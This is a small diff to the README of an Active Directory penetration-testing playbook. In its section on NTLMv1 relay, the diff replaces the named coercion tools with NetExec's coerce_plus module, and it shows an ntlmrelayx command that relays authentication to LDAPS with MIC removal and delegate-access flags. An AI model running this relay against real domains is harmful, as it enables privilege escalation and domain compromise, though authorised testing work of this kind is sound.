GunzyPunzy/Gunnajs-Playbook-ActiveDirectory/README.md

   <summary> NTLMv1-relay </summary>

   ### NTLMRelayx delegate access if NTLMv1 is enabled
-  #### Authentication can be forced via PetitPotam, DFSCoerce or PrinterBug, check if the answer is in NTLMv1
+  #### Authentication can be forced via NetExec's coerce_plus Module, check if the answer is in NTLMv1
   ```shell
   sudo python3 ntlmrelayx.py -t ldaps://<target> --remove-mic -smb2support --delegate-access
   ```